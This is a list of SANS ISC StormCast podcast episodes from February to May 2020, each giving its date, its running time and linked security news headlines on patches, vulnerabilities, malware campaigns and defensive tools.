Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+May+2020+Patch+Tuesday/26114/ Adobe Security Updates https://helpx.adobe.com/security.html Android Applications Expose Firebase Databases https://www.comparitech.com/blog/information-security/firebase-misconfiguration-report/#What_data_is_exposed More Magecart Sighted https://maxkersten.nl/2020/05/06/backtracking-magecart-infections/ Glitter vs. Thunderspy https://www.youtube.com/watch?v=vlK5rrlc44g
5/13/2020, 7 minutes, 3 seconds

ISC StormCast for Tuesday, May 12th 2020

Excel 4 Macro Analysis: XLMMacroDeobfuscator https://isc.sans.edu/forums/diary/Excel+4+Macro+Analysis+XLMMacroDeobfuscator/26110/ LinkedIn Phish https://youtu.be/g0WHz6rikoc ThunderSpy Thunderbolt Attack https://thunderspy.io/ vBulletin Vulnerability https://nvd.nist.gov/vuln/detail/CVE-2020-12720 Mini-Netwars https://www.sans.org/mini-netwars
5/12/2020, 5 minutes, 54 seconds

ISC StormCast for Monday, May 11th 2020

YARA 4.0.0 Released https://isc.sans.edu/forums/diary/YARA+v400+BASE64+Strings/26106/ VMWare Patches vRealize to Address Saltstack Vulnerabilities https://www.vmware.com/security/advisories/VMSA-2020-0009.html Samsung Patches Android RCE Vulnerabilities https://bugs.chromium.org/p/project-zero/issues/detail?id=2002 https://security.samsungmobile.com/securityUpdate.smsb MacOS 2FA Application Trojan https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/
5/11/2020, 5 minutes, 24 seconds

ISC StormCast for Friday, May 8th 2020

Scanning With NMAP NSE Scripts https://isc.sans.edu/forums/diary/Scanning+with+nmaps+NSE+scripts/26096/ iOS Psychic Paper Vulnerability https://siguza.github.io/psychicpaper/ World Password Day https://www.microsoft.com/security/blog/2020/05/07/protect-accounts-smarter-ways-sign-in-world-passwordless-day https://tails.boum.org/news/version_4.6/index.en.html Cisco Kerberos Bypass https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-asa-kerberos-bypass-96Gghe2sS
5/8/2020, 5 minutes, 47 seconds

ISC StormCast for Thursday, May 7th 2020

Keeping an Eye on Malicious Files Life Time https://isc.sans.edu/forums/diary/Keeping+an+Eye+on+Malicious+Files+Life+Time/26092/ Fake Crypto Wallet Chrome Extensions https://www.theregister.co.uk/2020/05/06/chrome_malicious_extensions/ Favicon Hides Credit Card Skimmer https://blog.malwarebytes.com/threat-analysis/2020/05/credit-card-skimmer-masquerades-as-favicon/ WebEx Phishing https://abnormalsecurity.com/blog/abnormal-attack-stories-cisco-webex-phishing/
5/7/2020, 5 minutes, 56 seconds

ISC StormCast for Wednesday, May 6th 2020

Do Cloud Security Features Replace Personnel Security Capabilities? https://isc.sans.edu/forums/diary/Cloud+Security+Features+Dont+Replace+the+Need+for+Personnel+Security+Capabilities/26088/ Citrix ShareFile Storage Zones Controller Update https://support.citrix.com/article/CTX269106 Android Update https://source.android.com/security/bulletin/2020-05-01 Firefox Update https://www.mozilla.org/en-US/firefox/76.0/releasenotes/ Dell OS Recovery Image Insecure Inherited Permissions https://www.dell.com/support/article/de-de/sln321036/dsa-2020-059-dell-os-recovery-image-insecure-inherited-permissions-vulnerability?lang=en WordPress Update https://wordpress.org/support/wordpress-version/version-5-4-1/#security-updates
5/6/2020, 5 minutes, 14 seconds

ISC StormCast for Tuesday, May 5th 2020

Exploring the Sysmon 11 File Deletion Protection https://isc.sans.edu/forums/diary/Sysmon+and+File+Deletion/26084/ Digicert CT Compromise https://groups.google.com/a/chromium.org/forum/#!topic/ct-policy/aKNbZuJzwfM WebLogic Flaw (new one..) Exploited in the Wild https://blogs.oracle.com/security/apply-april-2020-cpu
5/5/2020, 5 minutes, 24 seconds

ISC StormCast for Monday, May 4th 2020

ZIP Files and AES https://isc.sans.edu/forums/diary/ZIP+AES/26080/ Saltstack Vulnerability Exploited in the Wild https://status.ghost.org/ Mobile Device Manager Compromise https://research.checkpoint.com/2020/first-seen-in-the-wild-mobile-as-attack-vector-using-mdm/
5/4/2020, 5 minutes, 25 seconds

ISC StormCast for Friday, May 1st 2020

Collecting IOCs from IMAP Folder https://isc.sans.edu/forums/diary/Collecting+IOCs+from+IMAP+Folder/26070/ Attack Traffic on TCP Port 9673 https://isc.sans.edu/forums/diary/Attack+traffic+on+TCP+port+9673/26074/ Saltstack Authorization Bypass https://labs.f-secure.com/advisories/saltstack-authorization-bypass Mac Sandbox Escape https://lapcatsoftware.com/articles/sandbox-escape.html
5/1/2020, 7 minutes, 15 seconds

ISC StormCast for Thursday, April 30th 2020

Privacy Preserving Protocols to Trace Covid19 Exposure https://isc.sans.edu/forums/diary/Privacy+Preserving+Protocols+to+Trace+Covid19+Exposure/26066/ Google Chrome Update https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_27.html https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security Updated Version of Sysmon https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon https://techcommunity.microsoft.com/t5/sysinternals-blog/sysmon-v11-0-livekd-v5-63-process-explorer-v16-32-coreinfo-v3-5/ba-p/1345153 Shade Ransomware Keys Released https://github.com/shade-team/keys/blob/master/README.md Exploiting the Exploiters https://medium.com/@curtbraz/exploiting-the-exploiters-46fd0d620fd8
4/30/2020, 6 minutes, 16 seconds

ISC StormCast for Wednesday, April 29th 2020

Agent Tesla Delivered by the Same Phishing Campaign for Over a Year https://isc.sans.edu/forums/diary/Agent+Tesla+delivered+by+the+same+phishing+campaign+for+over+a+year/26062/ VMWare ESXi Patch https://www.vmware.com/security/advisories/VMSA-2020-0008.html Microsoft Guidance For Ransomware Response https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/ Adobe Security Patches https://helpx.adobe.com/security.html
4/29/2020, 4 minutes, 50 seconds

ISC StormCast for Tuesday, April 28th 2020

Powershell Payload Stored in a PSCredential Object https://isc.sans.edu/forums/diary/Powershell+Payload+Stored+in+a+PSCredential+Object/26058/ Microsoft Teams Account Takeover Bug https://www.cyberark.com/threat-research-blog/beware-of-the-gif-account-takeover-vulnerability-in-microsoft-teams/ USB Drives used to Spread Crypto Coin Mining Botnet https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/
4/28/2020, 6 minutes, 12 seconds

ISC StormCast for Monday, April 27th 2020

Malware Bazaar https://isc.sans.edu/forums/diary/MALWARE+Bazaar/26052/ CIRA Launches Canadian Shield https://www.cira.ca/newsroom/canadian-shield/cira-launches-canadian-shield-provide-free-privacy-and-security-canadians Covid19 Tracing Protocols https://github.com/DP-3T/documents https://www.pepp-pt.org/content https://www.apple.com/covid19/contacttracing/ Sophos XG Firewall SQL Injection Vulnerability Exploited https://community.sophos.com/kb/en-us/135412
4/27/2020, 7 minutes, 39 seconds

ISC StormCast for Friday, April 24th 2020

GCC's New Security Analyzer Finds Flaw in OpenSSL https://developers.redhat.com/blog/2020/03/26/static-analysis-in-gcc-10/ IBM Spectrum Protect Server Stack Based Buffer Overflow https://www.ibm.com/support/pages/node/6195706 Possible Issues With Cumulative Windows Updates https://www.reddit.com/search/?q=KB4549951 Using a GPU as a Radio https://duo.com/labs/research/finding-radio-sidechannels Comparing Red Team Platforms https://redcanary.com/blog/comparing-red-team-platforms/
4/24/2020, 7 minutes, 21 seconds

ISC StormCast for Thursday, April 23rd 2020

iOS Mail 0Day https://blog.zecops.com/vulnerabilities/unassisted-ios-attacks-via-mobilemail-maild-in-the-wild/ Zoom 5 To Be Released Shortly Addressing Encryption Issues https://blog.zoom.us/wordpress/2020/04/22/zoom-hits-milestone-on-90-day-security-plan-releases-zoom-5-0/ OpenSSL Fixes DOS Flaw https://www.openssl.org/news/secadv/20200421.txt
4/23/2020, 6 minutes, 4 seconds

ISC StormCast for Wednesday, April 22nd 2020

SpectX: Log Parser for DFIR https://isc.sans.edu/forums/diary/SpectX+Log+Parser+for+DFIR/26040/ Microsoft Patches Autodesk Library in Office https://www.autodesk.com/trust/security-advisories/adsk-sa-2020-0002 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200004 Stripe Data Collection https://mtlynch.io/stripe-recording-its-customers/ IBM Data Risk Manager Vulnerabilities https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md
4/22/2020, 5 minutes, 56 seconds

ISC StormCast for Tuesday, April 21st 2020

KPOT AutoIt Script: Analysis https://isc.sans.edu/forums/diary/KPOT+AutoIt+Script+Analysis/26012/ FPGA Vulnerability https://www.usenix.org/conference/usenixsecurity20/presentation/ender Nagios XI Vulnerability https://exchange.xforce.ibmcloud.com/vulnerabilities/179406
4/21/2020 - 5 minutes, 47 seconds

ISC StormCast for Monday, April 20th 2020

Weaponized RTF Document Generator Mailer in PowerShell https://isc.sans.edu/forums/diary/Weaponized+RTF+Document+Generator+Mailer+in+PowerShell/26030/ Microsoft Fixes Bad Anti-Malware Signatures https://www.microsoft.com/en-us/wdsi/definitions/antimalware-definition-release-notes Sophos Pulls Bad Firmware Update https://community.sophos.com/kb/en-us/135383 Credentials Stolen from Pulse Secure VPN Abused https://www.us-cert.gov/ncas/alerts/aa20-107a Chrome Update https://chromereleases.googleblog.com/2020/04/stable-channel-update-for-desktop_15.html
4/20/2020 - 5 minutes, 34 seconds

ISC StormCast for Friday, April 17th 2020

AppLocker vs. Living off the Land Attacks https://isc.sans.edu/forums/diary/Using+AppLocker+to+Prevent+Living+off+the+Land+Attacks/26032/ Netlink GPON 0-Day https://blog.netlab.360.com/multiple-fiber-routers-are-being-compromised-by-botnets-using-0-day-en/ Windows Security Crashing After Definition Update https://www.askwoody.com/2020/reports-of-windows-security-nee-microsoft-security-essentials-crashing-after-installing-this-mornings-definition-updates/ 700 Malicious Ruby Gems Found https://thehackernews.com/2020/04/rubygem-typosquatting-malware.html vCenter Exploit for CVE-2020-3952 https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/
4/17/2020 - 5 minutes, 50 seconds

ISC StormCast for Thursday, April 16th 2020

Hunting Without IOCs https://isc.sans.edu/forums/diary/No+IOCs+No+Problem+Getting+a+Start+Hunting+for+Malicious+Office+Files/26026/ Cloudflare/Online Banking Outages https://twitter.com/eastdakota/status/1250520852354854912 Crypto Currency Stealing Browser Extensions https://medium.com/mycrypto/discovering-fake-browser-extensions-that-target-users-of-ledger-trezor-mew-metamask-and-more-e281a2b80ff9
4/16/2020 - 5 minutes, 27 seconds

ISC StormCast for Wednesday, April 15th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+April+2020+Patch+Tuesday/26022/ Adobe Security Bulletins https://helpx.adobe.com/security.html Microsoft Extending EOL For Windows 10 1709/1809 https://support.microsoft.com/en-us/help/4557164/lifecycle-changes-to-end-of-support-and-servicing-dates Dell Safe BIOS https://blog.dellemc.com/en-us/dell-technologies-bolsters-pc-security-todays-remote-workers/
4/15/2020 - 5 minutes

ISC StormCast for Tuesday, April 14th 2020

Comparing the Same Phishing Campaign 3 Months Apart https://isc.sans.edu/forums/diary/Look+at+the+same+phishing+campaign+3+months+apart/26018/ Setting 3D Printers On Fire https://www.coalfire.com/The-Coalfire-Blog/April-2020/With-IoT-Common-Devices-Pose-New-Threats Junos OS: vMX Default Credentials https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10998 DNS is Changing: So What? (@Mic Webinar) https://www.sans.org/webcasts/113635
4/14/2020 - 6 minutes, 20 seconds

ISC StormCast for Monday, April 13th 2020

Dynamic Analysis Technique to Get Decrypted KPOT Malware https://isc.sans.edu/forums/diary/Reader+Analysis+Dynamic+analysis+technique+to+get+decrypted+KPOT+Malware/26010/ VMware vCenter Server Vulnerability https://www.vmware.com/security/advisories/VMSA-2020-0006.html Sodinokibi Ransomware Switching to Monero https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/ Malware Impersonates Security Researchers https://www.bleepingcomputer.com/news/security/new-wiper-malware-impersonates-security-researchers-as-prank/
4/13/2020 - 5 minutes, 18 seconds

ISC StormCast for Friday, April 10th 2020

Spoofing OS Fingerprints https://isc.sans.edu/forums/diary/Performing+deception+to+OS+Fingerprint+Part+1+nmap/25960/ Dell iDRAC Patch https://www.dell.com/support/article/de-de/sln320717/dsa-2020-063-idrac-buffer-overflow-vulnerability?lang=en VISA Ends Magento 1 Support https://usa.visa.com/content/dam/VCOM/global/support-legal/documents/acquirer-advisory-magento-migration.pdf Slack WebRTC TURN Compromise https://www.rtcsec.com/2020/04/01-slack-webrtc-turn-compromise/ COVID 19 Domain Classifier https://isc.sans.edu/covidclassifier.html
4/10/2020 - 5 minutes, 45 seconds

ISC StormCast for Thursday, April 9th 2020

German Malspam Pushes ZLoader Malware; Decrypting HTTPS https://isc.sans.edu/forums/diary/German+malspam+pushes+ZLoader+malware/25996/ Microsoft Purchases Corp.com https://krebsonsecurity.com/2020/04/microsoft-buys-corp-com-so-bad-guys-cant/ Microsoft Delaying Removal of Basic Authentication from Exchange Online https://techcommunity.microsoft.com/t5/exchange-team-blog/basic-authentication-and-exchange-online-april-2020-update/ba-p/1275508 Dark Nexus Botnet https://www.bitdefender.com/files/News/CaseStudies/study/319/Bitdefender-PR-Whitepaper-DarkNexus-creat4349-en-EN-interactive.pdf
4/9/2020 - 5 minutes, 54 seconds

ISC StormCast for Wednesday, April 8th 2020

RDP Scanning Increase https://isc.sans.edu/forums/diary/Increase+in+RDP+Scanning/25994/ Atlassian Advises Users To Secure Jira Service Desk https://community.atlassian.com/t5/Jira-Service-Desk-articles/Tips-for-setting-customer-permissions-in-Jira-Service-Desk/ba-p/1340617 Android Updates https://support.google.com/pixelphone/thread/38337876
4/8/2020 - 5 minutes, 10 seconds

ISC StormCast for Tuesday, April 7th 2020

ROSTELECOM Reroutes Traffic for Multiple Cloud Providers https://twitter.com/bgpmon/status/1246842916502302723 https://bgpstream.com/event/230837 Vuln Cost Security Scanner for VS Code https://snyk.io/security-scanner-vuln-cost/ Microsoft Exchange Server Vulnerability still not Patched https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/ Fake Zoom Installer https://blog.trendmicro.com/trendlabs-security-intelligence/zoomed-in-a-look-into-a-coinminer-bundled-with-zoom-installer/
4/7/2020 - 6 minutes, 35 seconds

ISC StormCast for Monday, April 6th 2020

New Bypass Technique or Corrupt Word Document https://isc.sans.edu/forums/diary/New+Bypass+Technique+or+Corrupt+Word+Document/25984/ CitizenLab Analyzes Zoom Encryption https://citizenlab.ca/2020/04/move-fast-roll-your-own-crypto-a-quick-look-at-the-confidentiality-of-zoom-meetings/ https://www.sans.org/webcasts/zomg-its-zoom-114670 Mozilla Patches Critical Firefox Flaws https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/ Malicious JavaScript injected into Discord https://www.bleepingcomputer.com/news/security/discord-turned-into-an-account-stealer-by-updated-malware/
4/6/2020 - 5 minutes, 44 seconds

ISC StormCast for Friday, April 3rd 2020

Twitter Cache Bug in Firefox https://privacy.twitter.com/en/blog/2020/data-cache-firefox MS-SQL Server Attack https://www.guardicore.com/2020/04/vollgar-ms-sql-servers-under-attack/ More Zoom Vulnerabilities https://objective-see.com/blog/blog_0x56.html Covid-19 Economic Impact Payments Scams https://www.justice.gov/usao-edky/press-release/file/1265371/download Safari Camera Access Bug https://www.ryanpickren.com/webcam-hacking-overview
4/3/2020 - 6 minutes, 34 seconds

ISC StormCast for Thursday, April 2nd 2020

Qakbot Malspam Sent From an Infected Windows Host https://isc.sans.edu/forums/diary/Qakbot+malspam+sent+from+an+infected+Windows+host/25972/ TPOT Cowrie to ISC Logs https://isc.sans.edu/forums/diary/TPOTs+Cowrie+to+ISC+Logs/25976/ SSH Issues After macOS Update https://feed.tyler.io/so-uh-i-think-catalina-10154-broke-ssh/ Cloudflare DNS For Families https://blog.cloudflare.com/introducing-1-1-1-1-for-families/ Zoom Leaks Windows Password Hashes via UNC Links https://twitter.com/hackerfantastic/status/1245133371262619654
4/2/2020 - 6 minutes, 27 seconds

ISC StormCast for Wednesday, April 1st 2020

Kwampirs Update https://isc.sans.edu/forums/diary/Kwampirs+Targeted+Attacks+Involving+Healthcare+Sector/25968/ Exposed RDP https://blog.shodan.io/trends-in-internet-exposure/ D-Link DSL-2640B Vulnerability https://raelize.com/posts/d-link-dsl-2640b-security-advisories/ SMB 3.1.1 (CVE-2020-0796) Local Privilege Escalation Exploit https://github.com/danigargu/CVE-2020-0796
4/1/2020 - 6 minutes, 57 seconds

ISC StormCast for Tuesday, March 31st 2020

Crashing Windows Explorer Without a Click https://isc.sans.edu/forums/diary/Crashing+explorerexe+without+a+click/25966/ Zoom Privacy Policy https://blogs.harvard.edu/doc/2020/03/27/zoom/ Zoom Bombing https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic Zoom Related Domains Used for Phishing https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/
3/31/2020 - 6 minutes, 50 seconds

ISC StormCast for Monday, March 30th 2020

Covid19 Domain Classifier https://isc.sans.edu/covidclassifier.html https://www.youtube.com/watch?v=yNIlyJ3gI-4 Attackers Mail Malicious USB Drives and Teddy Bears https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/ Hong Kong News Sites Used to Install Malware on iOS Devices https://blog.trendmicro.com/trendlabs-security-intelligence/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/
3/30/2020 - 5 minutes, 38 seconds

ISC StormCast for Friday, March 27th 2020

Very Large Sample as an Obfuscation Technique https://isc.sans.edu/forums/diary/Very+Large+Sample+as+Evasion+Technique/25948/ iOS VPN Bypass https://protonvpn.com/blog/apple-ios-vulnerability-disclosure/ Free Covid19 Domain List https://www.domaintools.com/resources/blog/free-covid-19-threat-list-domain-risk-assessments-for-coronavirus-threats Linux Rubber Ducky Protection https://opensource.googleblog.com/2020/03/usb-keystroke-injection-protection.html
3/27/2020 - 5 minutes, 40 seconds

ISC StormCast for Thursday, March 26th 2020

Dridex Update https://isc.sans.edu/forums/diary/Recent+Dridex+activity/25944/ Covid-19 Ransom https://twitter.com/johullrich/status/1242983197555789824 HP Enterprise SSD Firmware Bug https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=a00097382en_us Fake Google Chrome Update https://news.drweb.com/show/?i=13746&lng=en TrickBot Pushing a 2FA Bypass App in Germany https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/
3/26/2020 - 5 minutes, 23 seconds

ISC StormCast for Wednesday, March 25th 2020

Updated Microsoft Advisory 200006 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv200006 Memcached Denial of Service Vulnerability https://github.com/memcached/memcached/issues/629 Adobe Creative Cloud Desktop Application Patches https://helpx.adobe.com/security/products/creative-cloud/apsb20-11.html Microsoft Pausing Cumulative Updates Starting May https://docs.microsoft.com/en-us/windows/release-information/windows-message-center#405 Apple Security Patches https://support.apple.com/en-us/HT201222 OpenWRT Vulnerability Fixed https://thehackernews.com/2020/03/openwrt-rce-vulnerability.html
3/25/2020 - 5 minutes, 39 seconds

ISC StormCast for Tuesday, March 24th 2020

Windows Font Parsing 0-Day https://isc.sans.edu/forums/diary/Windows+Zeroday+Actively+Exploited+Type+1+Font+Parsing+Remote+Code+Execution+Vulnerability/25936/ Covid-19 Malware Summary https://github.com/parthdmaniar/coronavirus-covid-19-SARS-CoV-2-IoCs Firefox Turns TLS 1.0/1.1 Back on https://www.mozilla.org/en-US/firefox/74.0/releasenotes/
3/24/2020 - 6 minutes, 1 second

ISC StormCast for Monday, March 23rd 2020

More Covid19 Malware https://isc.sans.edu/forums/diary/More+COVID19+Themed+Malware/25930/ Working Exploit for the Kr00k Wifi Exploit https://hexway.io/research/r00kie-kr00kie/ ZDI Pwn2Own Results https://www.zerodayinitiative.com/blog/2020/3/17/welcome-to-pwn2own-2020-the-schedule-and-live-results
3/23/2020 - 6 minutes, 41 seconds

ISC StormCast for Friday, March 20th 2020

COVID-19 Themed Multistage Malware https://isc.sans.edu/forums/diary/COVID19+Themed+Multistage+Malware/25922/ Cisco SD-WAN Patches https://tools.cisco.com/security/center/publicationListing.x 0patch Selling Patches for Windows 7 https://twitter.com/0patch/status/1240602635205586945 LDAPFragger: Bypassing Network Restrictions Using LDAP Attributes https://research.nccgroup.com/2020/03/19/ldapfragger-bypassing-network-restrictions-using-ldap-attributes/
3/20/2020 - 5 minutes, 9 seconds

ISC StormCast for Thursday, March 19th 2020

TrendMicro Update https://success.trendmicro.com/solution/000245571 More VMware Updates https://www.vmware.com/security/advisories/VMSA-2020-0005.html EnigmaSpark Malware https://securityintelligence.com/posts/EnigmaSpark-Politically-Themed-Cyber-Activity-Highlights-Regional-Opposition-to-Middle-East-Peace-Plan/ Recent Ransomware Trends https://www.fireeye.com/blog/threat-research/2020/03/they-come-in-the-night-ransomware-deployment-trends.html
3/19/2020 - 6 minutes, 7 seconds

ISC StormCast for Wednesday, March 18th 2020

A Quick Summary of Current Reflective DNS DDoS Attacks https://isc.sans.edu/forums/diary/A+Quick+Summary+of+Current+Reflective+DNS+DDoS+Attacks/25916/ Trickbot gtag red5 distributed as DLL File https://isc.sans.edu/forums/diary/Trickbot+gtag+red5+distributed+as+a+DLL+file/25918/ Is Cryptojacking Dead after Coinhive Shutdown https://arxiv.org/pdf/2001.02975.pdf Adobe Patches https://helpx.adobe.com/security/products/acrobat/apsb20-13.html
3/18/2020 - 7 minutes, 45 seconds

ISC StormCast for Tuesday, March 17th 2020

Desktop.ini as a Post-Exploitation Tool https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ VMware Workstation/Fusion Update https://www.vmware.com/security/advisories/VMSA-2020-0004.html Blackwater Malware Abuses Cloudflare Workers https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/ tcpdump Heap Based Buffer Over-Read https://nvd.nist.gov/vuln/detail/CVE-2018-19325 Slack Account Takeover Bug https://hackerone.com/reports/737140
3/17/2020 - 5 minutes, 52 seconds

ISC StormCast for Monday, March 16th 2020

Phishing PDFs With Incremental Updates https://isc.sans.edu/forums/diary/Phishing+PDF+With+Incremental+Updates/25904/ VPN Access and Activity Monitoring https://isc.sans.edu/forums/diary/VPN+Access+and+Activity+Monitoring/25906/ Capturing Invalid Ethernet Frames https://isc.sans.edu/forums/diary/Not+all+Ethernet+NICs+are+Created+Equal+Trying+to+Capture+Invalid+Ethernet+Frames/25896/ Cookiethief Android Cookie Stealing Malware https://securelist.com/cookiethief/96332/ SANS Security Awareness Deployment Kit for Securing Your Workforce at Home https://www.sans.org/webcasts/113875
3/16/2020 - 6 minutes, 53 seconds

ISC StormCast for Friday, March 13th 2020

Microsoft Releases Patch for Windows SMBv3 Compression Vulnerability CVE-2020-0796 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796 Hancitor Distributed Through Coronavirus-Themed Malspam https://isc.sans.edu/forums/diary/Hancitor+distributed+through+coronavirusthemed+malspam/25892/ Avast Removes Vulnerable JavaScript Emulator From Products https://github.com/taviso/avscript Checkra1n Exploit Works Against T2 Equipped Macs https://www.idownloadblog.com/2020/03/10/luca-todesco-teases-checkra1n-hacks-on-a-t2-equipped-macbook-pros-touch-bar/
3/13/2020 - 6 minutes, 48 seconds

ISC StormCast for Thursday, March 12th 2020

Mystery SMB3 Flaw Update https://isc.sans.edu/forums/diary/Critical+SMBv3+Vulnerability+Remote+Code+Execution/25890/
COVID-19 Malware https://blog.reasonsecurity.com/2020/03/09/covid-19-info-stealer-the-map-of-threats-threat-analysis-report/
Agent Tesla Spread by Fake Canon EOS Notification Email https://isc.sans.edu/forums/diary/Agent+Tesla+Delivered+via+Fake+Canon+EOS+Notification+on+Free+OwnCloud+Account/25884/
3/12/2020 (5 minutes, 45 seconds)

ISC StormCast for Wednesday, March 11th 2020

Microsoft Patch Tuesday https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005 https://isc.sans.edu/diary.html?storyid=25886
3/11/2020 (5 minutes, 17 seconds)

ISC StormCast for Tuesday, March 10th 2020

Malicious Spreadsheet With Data Connection and Excel 4 Macros https://isc.sans.edu/forums/diary/Malicious+Spreadsheet+With+Data+Connection+and+Excel+4+Macros/25880/
Take a Way: Exploring the Security Implications of AMD's Cache Way Predictors https://mlq.me/download/takeaway.pdf https://www.amd.com/en/corporate/product-security
Google Play Store Protect Fails Security Test https://www.av-test.org/en/news/here-s-how-well-17-android-security-apps-provide-protection/
3/10/2020 (6 minutes, 45 seconds)

ISC StormCast for Monday, March 9th 2020

Excel Maldocs: Hidden Sheets https://isc.sans.edu/forums/diary/Excel+Maldocs+Hidden+Sheets/25876/
Wireshark 3.2.2 Released https://www.wireshark.org/docs/relnotes/wireshark-3.2.2.html
Linux PPP Vulnerability https://www.kb.cert.org/vuls/id/782301/
NordVPN Vulnerability https://www.theregister.co.uk/2020/03/06/nordvpn_no_auth_needed_view_user_payments/
Unpatched Android Devices https://www.which.co.uk/news/2020/03/more-than-one-billion-android-devices-at-risk-of-malware-threats/
3/9/2020 (5 minutes, 30 seconds)

ISC StormCast for Friday, March 6th 2020

Survey Phish https://isc.sans.edu/forums/diary/Will+You+Put+Your+Password+in+a+Survey/25866/
Healthcare.gov Sending E-Mail Looking Like Phishing https://twitter.com/johullrich/status/1235740586717720577
Intel x86 Root of Trust: Loss of Trust https://blog.ptsecurity.com/2020/03/intelx86-root-of-trust-loss-of-trust.html
Let's Encrypt Revises Revocation Plan https://community.letsencrypt.org/t/2020-02-29-caa-rechecking-bug/114591/2
Trust Me, I'm Certified Podcast https://www.giac.org/podcasts
3/6/2020 (6 minutes, 15 seconds)

ISC StormCast for Thursday, March 5th 2020

MSFT Subdomain Takeover https://vullnerability.com/blog/microsoft-subdomain-account-takeover
Homoglyph Attacks in the News Again https://www.soluble.ai/blog/public-disclosure-emoji-to-zero-day
Coronavirus Phish https://twitter.com/JCyberSec_/status/1234806881195044865
3/5/2020 (6 minutes, 46 seconds)

ISC StormCast for Wednesday, March 4th 2020

Introduction to EvtxEcmd (Evtx Explorer) https://isc.sans.edu/forums/diary/Introduction+to+EvtxEcmd+Evtx+Explorer/25858/
Let's Encrypt Revoking Certificates https://community.letsencrypt.org/t/revoking-certain-certificates-on-march-4/114864
Using Smart Devices in the Home Securely (NCSC Version) https://www.ncsc.gov.uk/guidance/smart-devices-in-the-home
Ransomware and Cloud Backups https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/
SANS Coronavirus Training Guarantee https://www.sans.org/training-guarantee
3/4/2020 (6 minutes, 18 seconds)

ISC StormCast for Tuesday, March 3rd 2020

SSL Distribution by Country https://isc.sans.edu/forums/diary/Secure+vs+cleartext+protocols+couple+of+interesting+stats/25854/
Checkpoint Evasion Encyclopedia https://research.checkpoint.com/2020/cpr-evasion-encyclopedia-the-check-point-evasion-repository/
OWASP Threat Dragon https://github.com/mike-goodwin/owasp-threat-dragon-desktop
SANS Free Things https://sans.org/free
3/3/2020 (5 minutes, 46 seconds)

ISC StormCast for Monday, March 2nd 2020

Show me Your Clipboard Data! https://isc.sans.edu/forums/diary/Show+me+Your+Clipboard+Data/25846/
Hazelcast IMDG Discover Scan https://isc.sans.edu/forums/diary/Hazelcast+IMDG+Discover+Scan/25850/
Microsoft Exchange Server Vulnerability Scans https://twitter.com/GossiTheDog/status/1232369036438233088
Tomcat Ghostcat Vulnerability https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
3/2/2020 (5 minutes, 6 seconds)

ISC StormCast for Friday, February 28th 2020

Ultrasonic Triggers for Cellphone Assistants https://source.wustl.edu/2020/02/surfing-attack-hacks-siri-google-with-ultrasonic-waves/
Comparing Information Leakage from Different Browsers https://www.scss.tcd.ie/Doug.Leith/pubs/browser_privacy.pdf
Cloud Snooper Attack https://news.sophos.com/en-us/2020/02/25/cloud-snooper-attack-bypasses-firewall-security-measures/
2/28/2020 (5 minutes, 33 seconds)

ISC StormCast for Thursday, February 27th 2020

Kr00k WiFi Attack https://www.eset.com/int/kr00k/
Impersonating LTE Users https://imp4gt-attacks.net/
Zyxel RCE Vulnerability https://www.kb.cert.org/vuls/id/498544/
2/27/2020 (6 minutes, 48 seconds)

ISC StormCast for Wednesday, February 26th 2020

Fraudulent PayPal Charges (links in German) https://twitter.com/iblueconnection/status/1232259071602044928 https://www.heise.de/security/meldung/Google-Pay-Luecke-in-virtuellen-Kreditkarten-erlaubt-unberechtigte-Abbuchungen-4667527.html https://stadt-bremerhaven.de/google-pay-virtuelle-paypal-kreditkarten-weisen-sicherheitsluecken-auf/
Chrome Update https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html
Microsoft Public Preview For Azure AD Hybrid Environments https://techcommunity.microsoft.com/t5/azure-active-directory-identity/public-preview-of-azure-ad-support-for-fido2-security-keys-in/ba-p/1187929
2/26/2020 (5 minutes, 33 seconds)

ISC StormCast for Tuesday, February 25th 2020

ScrollToTextFragment Privacy Concerns in Google Chrome 80 https://github.com/WICG/ScrollToTextFragment/issues/76#issue-538137989 https://docs.google.com/document/d/1YHcl1-vE_ZnZ0kL2almeikAj2gkwCq8_5xwIae7PVik/edit#heading=h.uoiwg23pt0tx
Another OpenSMTPD Vulnerability https://github.com/OpenSMTPD/OpenSMTPD/releases
WhatsApp Group Invite Links in Search Engines https://twitter.com/JordanWildon/status/1230829082662842369
